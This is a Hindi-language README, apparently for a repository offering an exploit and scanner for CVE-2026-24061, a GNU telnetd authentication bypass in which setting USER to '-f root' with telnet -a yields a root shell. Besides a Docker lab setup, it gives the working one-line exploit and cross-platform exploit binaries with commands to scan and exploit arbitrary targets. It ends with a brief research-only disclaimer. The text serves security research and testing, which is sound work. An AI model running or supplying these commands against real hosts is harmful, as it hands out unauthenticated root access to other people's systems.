
CVE-2026-24061 के लिए एक्सप्लॉइट और स्कैनर, जो telnetd प्रमाणीकरण बाईपास है और निर्मित USER पर्यावरण चर के माध्यम से रूट शेल प्रदान करता है। इसमें Docker पर्यावरण सेटअप और क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट बाइनरी शामिल हैं।
CVE-2026-24061 telnetd में एक प्रमाणीकरण बाईपास भेद्यता है जो हमलावरों को पर्यावरण चरों के विशिष्ट संयोजनों के माध्यम से पहचान सत्यापन को बायपास करने और सीधे रूट-विशेषाधिकार वाला शेल प्राप्त करने की अनुमति देती है।
telnetd की प्रमाणीकरण तर्क में एक दोष है। जब -a विकल्प (स्वचालित लॉगिन) का उपयोग किसी विशिष्ट USER पर्यावरण चर (जैसे -f root) के साथ किया जाता है, तो सामान्य प्रमाणीकरण प्रक्रिया को बायपास करना और सीधे रूट उपयोगकर्ता के रूप में लॉग इन करना संभव है।
GNU InetUtils GNU परियोजना के अंतर्गत बुनियादी नेटवर्क उपकरणों का एक संग्रह है। इसमें कई पारंपरिक नेटवर्क क्लाइंट और डेमॉन शामिल हैं, जैसे ftp, telnet, rsh, rlogin, tftp, आदि, जो एक व्यापक और GNU-शैली नेटवर्क घटक लाइब्रेरी प्रदान करते हैं। इस टूलकिट में सर्वर प्रोग्राम है जो आने वाले Telnet कनेक्शन अनुरोधों को संभालने के लिए जिम्मेदार है, जिसका प्राथमिक कार्य दूरस्थ उपयोगकर्ताओं को एक इंटरैक्टिव टर्मिनल इंटरफ़ेस (आमतौर पर एक शेल) प्रदान करना है।
telnetdinetd या xinetd द्वारा पोर्ट 23 पर निगरानी की जाती है। जब कोई अनुरोध आता है, तो telnetd प्रारंभ किया जाता है।login प्रोग्राम को कॉल करता है।सबसे पहले, इस रिपॉजिटरी को स्थानीय रूप से डाउनलोड करें। निर्देशिका संरचना इस प्रकार है:

इस निर्देशिका में, CVE-2026-24061 के लिए भेद्य वातावरण प्रारंभ करने के लिए निम्नलिखित कमांड निष्पादित करें:
docker compose up -d --build

प्रारंभ होने के बाद, telnet सेवा 0.0.0.0:2323 पर चलेगी

-a विकल्प स्वचालित लॉगिन कार्यक्षमता को सक्षम करने के लिए उपयोग किया जाता है-a सक्षम होता है, तो telnetd USER पर्यावरण चर को लॉगिन उपयोगकर्ता नाम के रूप में पढ़ता हैUSER पर्यावरण चर -f root पर सेट है, तो telnetd गलती से -f को एक विकल्प फ्लैग और root को लक्षित उपयोगकर्ता के रूप में व्याख्या करता है# USER पर्यावरण चर सेट करें और telnet -a के साथ कनेक्ट करें
env USER='-f root' telnet -a 127.0.0.1 2323
सफल होने पर, आपको रूट विशेषाधिकारों के साथ एक इंटरैक्टिव शेल प्राप्त होगा:

cd exp

आप तीन फ़ाइलें देख सकते हैं: exp, exp_darwin, और exp.exe क्रमशः Linux, Mac और Windows के लिए निष्पादन योग्य फ़ाइलें हैं। जिसकी आवश्यकता हो उसे चुनें। टूल का स्रोत कोड भी प्रदान किया गया है। यदि आपको अन्य संस्करणों की आवश्यकता है, तो आप उन्हें स्वयं संकलित कर सकते हैं। यहाँ मैं Linux के लिए exp का उपयोग कर रहा हूँ, जिसमें विस्तृत सहायता जानकारी है।

जाँचें कि भेद्यता मौजूद है या नहीं (डिफ़ॉल्ट रूप से पोर्ट 23 स्कैन करता है):
./exp -mode scan -target your-ip -port your-port

भेद्यता का शोषण करें और शेल प्राप्त करें:
./exp -mode exploit -target your-ip -port your-port

यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इसे अनधिकृत सिस्टम पर उपयोग न करें। इस टूल के उपयोग से उत्पन्न किसी भी परिणाम के लिए उपयोगकर्ता सभी कानूनी जिम्मेदारी वहन करते हैं।